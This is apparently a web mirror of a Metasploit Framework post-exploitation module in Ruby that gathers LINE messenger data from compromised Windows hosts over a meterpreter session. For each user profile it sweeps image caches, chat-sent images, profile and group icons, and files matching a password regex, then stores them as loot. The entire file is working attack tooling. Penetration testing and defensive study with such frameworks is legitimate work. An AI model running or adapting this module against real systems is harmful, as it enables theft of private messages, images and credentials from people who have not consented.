Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/line.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
8
include Msf::Post::File
9
include Msf::Post::Windows::UserProfiles
10
include Msf::Post::Windows::Packrat
11
12
ARTIFACTS =
13
{
14
application: 'line',
15
app_category: 'chats',
16
gatherable_artifacts: [
17
{
18
filetypes: 'images',
19
path: 'LocalAppData',
20
dir: 'LINE',
21
artifact_file_name: '*.png',
22
description: 'Image cache with png extension',
23
credential_type: 'chat_log'
24
},
25
{
26
filetypes: 'images',
27
path: 'LocalAppData',
28
dir: 'LINE',
29
artifact_file_name: '*.jpeg',
30
description: 'Image cache for jpg cache',
31
credential_type: 'chat_log'
32
},
33
{
34
filetypes: 'images',
35
path: 'LocalAppData',
36
dir: 'LINE\\Cache\\p',
37
artifact_file_name: '*',
38
description: 'Image cache for profile images of users',
39
credential_type: 'chat_log'
40
},
41
{
42
filetypes: 'images',
43
path: 'LocalAppData',
44
dir: 'LINE\\Cache\\g',
45
artifact_file_name: '*',
46
description: 'Image cache for group icons',
47
credential_type: 'chat_log'
48
},
49
{
50
filetypes: 'images',
51
path: 'LocalAppData',
52
dir: 'LINE\\Cache\\m',
53
artifact_file_name: '*',
54
description: 'Image cache for images sent through chat',
55
credential_type: 'chat_log'
56
},
57
{
58
filetypes: 'images',
59
path: 'LocalAppData',
60
dir: 'LINE\\Cache\\e',
61
artifact_file_name: '*',
62
description: 'Image cache for profile images sent by official accounts',
63
credential_type: 'chat_log'
64
},
65
{
66
filetypes: 'images',
67
path: 'LocalAppData',
68
dir: 'LINE\\Data\\pizza',
69
artifact_file_name: '*',
70
description: 'Image cache for profile images of users',
71
credential_type: 'chat_log'
72
}
73
]
74
}.freeze
75
76
def initialize(info = {})
77
super(
78
update_info(
79
info,
80
'Name' => 'LINE Credential Gatherer',
81
'Description' => %q{
82
This module searches for credentials in LINE desktop application on a Windows host. LINE is the most popular Instant Messenger app in Japan.
83
},
84
'License' => MSF_LICENSE,
85
'Author' => [
86
'Kazuyoshi Maruta',
87
'Daniel Hallsworth',
88
'Barwar Salim M',
89
'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
90
],
91
'Platform' => ['win'],
92
'SessionTypes' => ['meterpreter'],
93
'Notes' => {
94
'Stability' => [CRASH_SAFE],
95
'Reliability' => [],
96
'SideEffects' => []
97
}
98
)
99
)
100
101
register_options(
102
[
103
OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
104
OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
105
OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
106
# enumerates the options based on the artifacts that are defined below
107
OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
108
]
109
)
110
end
111
112
def run
113
print_status('Filtering based on these selections: ')
114
print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
115
print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
116
print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
117
118
# used to grab files for each user on the remote host
119
grab_user_profiles.each do |userprofile|
120
run_packrat(userprofile, ARTIFACTS)
121
end
122
123
print_status 'PackRat credential sweep completed'
124
end
125
end
126
127